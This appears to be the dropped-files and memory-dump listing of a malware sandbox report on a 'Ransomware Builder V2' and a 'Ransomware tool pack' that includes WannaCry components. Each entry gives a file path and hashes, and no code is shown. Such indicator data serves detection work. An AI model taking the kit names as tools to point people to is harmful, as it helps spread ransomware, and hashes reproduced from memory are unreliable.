068e5813ffd54c37a352fa1dbca86bb114ccace6

SHA256
d1e84a6b637ba81f38889a8feebc6ee6b6a656aead2b62b4853ff3a1917ab404

SHA512
b33f363911c70d0315676ab031ab68272727b31ca01b3667ce7ac67fba676f0200691c7fe21df8058557f5c1183112218fdcbe7456a99afe4caead7fa7caa6e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\skin.888cx.msstyles

Filesize
1.1MB

MD5
719c51f5637d922e8416e23d0978b8cb

SHA1
ebfc5fe2fcf48a36505716e997b1e2fab6365d85

SHA256
6cf0bf46c9ee98fde7eb4dbc0b147e33babeabf9b1f50a4722e29dd57e95ef09

SHA512
129a355ca1ace8c8ce7254c285d5e90b55941f18ff5fcaf6109aa502d18f543b7596493ce69c0bc167ce41bdc8622d4bf8529ecbd88fb0d9f963bfbcb91e24ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\skin.dll

Filesize
239KB

MD5
29e1d5770184bf45139084bced50d306

SHA1
76c953cd86b013c3113f8495b656bd721be55e76

SHA256
794987c4069286f797631f936c73b925c663c42d552aeca821106dfc7c7ba307

SHA512
7cb3d0788978b6dc5a78f65349366dac3e91b1557efa4f385984bef4940b3ea859f75cfe42c71f6fe445555138f44305531de6a89c5beff4bf9d42001b4348e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\upx.exe

Filesize
283KB

MD5
308f709a8f01371a6dd088a793e65a5f

SHA1
a07c073d807ab0119b090821ee29edaae481e530

SHA256
c0f9faffdf14ab2c853880457be19a237b10f8986755f184ecfe21670076cb35

SHA512
c107f1af768d533d02fb82ae2ed5c126c63b53b11a2e5a5bbf45e396cb7796ca4e7984ce969b487ad38d817f4d4366e7953fb555b279aa019ffb5d1bbba57e28

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
7.7MB

MD5
b1643efc19b9dbb9775926e62e593f2d

SHA1
cb1085b163ff5d9e262ffa58e7a5581d7eb898d7

SHA256
3990c4ee642a22e29fceaef73f6296933d54769934f0c2a18f683e5720b15574

SHA512
7002799c5ca45f72408b79a6437c4f6ad4180fa58c4620aede43ca465a83dacef683a6567fc39bdc8f9d7f225e7edd062ebf37a6e42ab3ba35096ba9b24be4d1

Download Submit
C:\Users\Admin\Desktop\Ransomware Builder V2\@[email protected]

Filesize
1KB

MD5
c15039f4d21558f72f90a5608a99781c

SHA1
bd700905c105745751c6aa8782b1e71d2085b9bf

SHA256
ab8328cdc48218f0b144da0c1425906100cb31e914903bed50f22aaf8b2935fe

SHA512
e7302d049925ca8aa34f7696e1eb7ffcf975f6d5707d59a29764642d9ddb205fe47b69f07445e107699b659a7c4114b541c4ad3d16ba88eab39c9fcc752cf06f

Download Submit
C:\Users\Admin\Desktop\Ransomware Builder V2\ransom_builder.exe

Filesize
4.3MB

MD5
43a2c7ba0ecd3a1b8ff0b82a0e82296d

SHA1
9b106aa440085d1cf76889a186a4c0ece9f86b06

SHA256
bb623a98f1d61f13d2de4dee55b14f97956e8306aa66d945aab0b00538b95900

SHA512
2d1d9c37fcfc1f38e71a6f7be68431ec5e7220dd8eb8df6fa612be62bed071fdf1f505c9702d69719e74c99ae02af4a48909f63862addca7c4e911c1792b8f59

Download Submit
C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]

Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1

Filesize
4KB

MD5
c8aaa0f60679cc42e71dee2fd9bf213b

SHA1
b3de3009a2ee9cb86d29bb67e9374fc57ed3de02

SHA256
9268d33bb917de8f9975f018d8d5ffc6edf20e19b1fb03d6d45c73d54440ed6c

SHA512
a15be8e551180ea64627eaf27ea93d2ba49349d276a0e76ebf11a83c8392b7af9457866fab3432d34918d84cc5260abf07625944f238aaf54e071235cc4250d7

Download Submit
C:\Users\Default\Desktop\@[email protected]

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
memory/632-1170-0x0000000000400000-0x000000000057E000-memory.dmp

Filesize
1.5MB

Download
memory/632-1172-0x0000000000400000-0x000000000057E000-memory.dmp

Filesize
1.5MB

Download
memory/1684-1386-0x0000000005950000-0x0000000005CA4000-memory.dmp

Filesize
3.3MB

Download
memory/1888-438-0x0000018DA2900000-0x0000018DA2901000-memory.dmp

Filesize
4KB

Download
memory/1888-439-0x0000018DA2900000-0x0000018DA2901000-memory.dmp

Filesize
4KB

Download
memory/1888-424-0x0000018D99B90000-0x0000018D99BA0000-memory.dmp

Filesize
64KB

Download
memory/1888-437-0x0000018DA2900000-0x0000018DA2901000-memory.dmp

Filesize
4KB

Download
memory/1888-436-0x0000018DA2900000-0x0000018DA2901000-memory.dmp

Filesize
4KB

Download
memory/1888-435-0x0000018DA2860000-0x0000018DA2861000-memory.dmp

Filesize
4KB

Download
memory/1888-433-0x0000018DA2860000-0x0000018DA2861000-memory.dmp

Filesize
4KB

Download
memory/1888-431-0x0000018DA27E0000-0x0000018DA27E1000-memory.dmp

Filesize
4KB

Download
memory/1888-420-0x0000018D99B50000-0x0000018D99B60000-memory.dmp

Filesize
64KB

Download
memory/3336-180-0x00007FFA873A0000-0x00007FFA87875000-memory.dmp

Filesize
4.8MB

Download
memory/3336-181-0x00007FFA86E50000-0x00007FFA8739F000-memory.dmp

Filesize
5.3MB

Download
memory/3336-175-0x00007FFA87EA0000-0x00007FFA880E1000-memory.dmp

Filesize
2.3MB

Download
memory/3336-168-0x00007FFA88750000-0x00007FFA8897C000-memory.dmp

Filesize
2.2MB

Download
memory/3808-681-0x00000000749E0000-0x0000000074BF0000-memory.dmp

Filesize
2.1MB

Download
memory/3808-666-0x0000000076760000-0x00000000767DA000-memory.dmp

Filesize
488KB

Download
memory/3808-699-0x00000000749E0000-0x0000000074BF0000-memory.dmp

Filesize
2.1MB

Download
memory/3808-698-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-697-0x0000000075740000-0x0000000075813000-memory.dmp

Filesize
844KB

Download
memory/3808-696-0x0000000075820000-0x0000000075845000-memory.dmp

Filesize
148KB

Download
memory/3808-695-0x0000000074930000-0x00000000749A4000-memory.dmp

Filesize
464KB

Download
memory/3808-694-0x0000000076B50000-0x0000000077103000-memory.dmp

Filesize
5.7MB

Download
memory/3808-693-0x0000000075690000-0x000000007573F000-memory.dmp

Filesize
700KB

Download
memory/3808-692-0x00000000749E0000-0x0000000074BF0000-memory.dmp

Filesize
2.1MB

Download
memory/3808-691-0x0000000074930000-0x00000000749A4000-memory.dmp

Filesize
464KB

Download
memory/3808-690-0x0000000076B50000-0x0000000077103000-memory.dmp

Filesize
5.7MB

Download
memory/3808-689-0x0000000075690000-0x000000007573F000-memory.dmp

Filesize
700KB

Download
memory/3808-688-0x00000000749E0000-0x0000000074BF0000-memory.dmp

Filesize
2.1MB

Download
memory/3808-687-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-684-0x0000000074930000-0x00000000749A4000-memory.dmp

Filesize
464KB

Download
memory/3808-680-0x0000000075FE0000-0x00000000760BC000-memory.dmp

Filesize
880KB

Download
memory/3808-678-0x0000000075AB0000-0x0000000075B93000-memory.dmp

Filesize
908KB

Download
memory/3808-677-0x0000000076B50000-0x0000000077103000-memory.dmp

Filesize
5.7MB

Download
memory/3808-686-0x0000000075740000-0x0000000075813000-memory.dmp

Filesize
844KB

Download
memory/3808-685-0x0000000075AB0000-0x0000000075B93000-memory.dmp

Filesize
908KB

Download
memory/3808-683-0x0000000076B50000-0x0000000077103000-memory.dmp

Filesize
5.7MB

Download
memory/3808-679-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-675-0x00000000749E0000-0x0000000074BF0000-memory.dmp

Filesize
2.1MB

Download
memory/3808-670-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-671-0x0000000076760000-0x00000000767DA000-memory.dmp

Filesize
488KB

Download
memory/3808-667-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-676-0x0000000075690000-0x000000007573F000-memory.dmp

Filesize
700KB

Download
memory/3808-669-0x0000000075820000-0x0000000075845000-memory.dmp

Filesize
148KB

Download
memory/3808-700-0x0000000075690000-0x000000007573F000-memory.dmp

Filesize
700KB

Download
memory/3808-664-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-663-0x0000000076760000-0x00000000767DA000-memory.dmp

Filesize
488KB

Download
memory/3808-672-0x0000000075820000-0x0000000075845000-memory.dmp

Filesize
148KB

Download
memory/3808-668-0x0000000076760000-0x00000000767DA000-memory.dmp

Filesize
488KB

Download
memory/3808-747-0x0000000010000000-0x00000000100BB000-memory.dmp

Filesize
748KB

Download
memory/3808-1167-0x0000000010000000-0x00000000100BB000-memory.dmp

Filesize
748KB

Download
memory/3808-701-0x0000000076B50000-0x0000000077103000-memory.dmp

Filesize
5.7MB

Download
memory/3808-702-0x0000000074930000-0x00000000749A4000-memory.dmp

Filesize
464KB

Download
memory/3808-703-0x0000000075740000-0x0000000075813000-memory.dmp

Filesize
844KB

Download
memory/3808-654-0x0000000010000000-0x00000000100BB000-memory.dmp

Filesize
748KB

Download
memory/3808-662-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-665-0x0000000076760000-0x00000000767DA000-memory.dmp

Filesize
488KB

Download
memory/3808-674-0x0000000075820000-0x0000000075845000-memory.dmp

Filesize
148KB

Download
memory/3808-673-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-704-0x0000000000CB0000-0x0000000001102000-memory.dmp

Filesize
4.3MB

Download
memory/3808-682-0x0000000075690000-0x000000007573F000-memory.dmp

Filesize
700KB

Download
memory/3808-705-0x0000000075FE0000-0x00000000760BC000-memory.dmp

Filesize
880KB

Download
memory/3808-706-0x00000000749E0000-0x0000000074BF0000-memory.dmp

Filesize
2.1MB

Download
memory/4672-1487-0x00000000060A0000-0x00000000063F4000-memory.dmp

Filesize
3.3MB

Download
memory/4672-1497-0x00000000068C0000-0x000000000690C000-memory.dmp

Filesize
304KB

Download
memory/5068-1283-0x0000000006180000-0x00000000061CC000-memory.dmp

Filesize
304KB

Download
memory/5068-1282-0x0000000006130000-0x000000000614E000-memory.dmp

Filesize
120KB

Download
memory/5068-1281-0x0000000005C40000-0x0000000005F94000-memory.dmp

Filesize
3.3MB

Download
memory/5068-1271-0x0000000005AD0000-0x0000000005B36000-memory.dmp

Filesize
408KB

Download
memory/5068-1270-0x0000000005410000-0x0000000005476000-memory.dmp

Filesize
408KB

Download
memory/5068-1269-0x00000000052B0000-0x00000000052D2000-memory.dmp

Filesize
136KB

Download
memory/5068-1268-0x00000000054A0000-0x0000000005AC8000-memory.dmp

Filesize
6.2MB

Download
memory/5068-1267-0x0000000002830000-0x0000000002866000-memory.dmp

Filesize
216KB

Download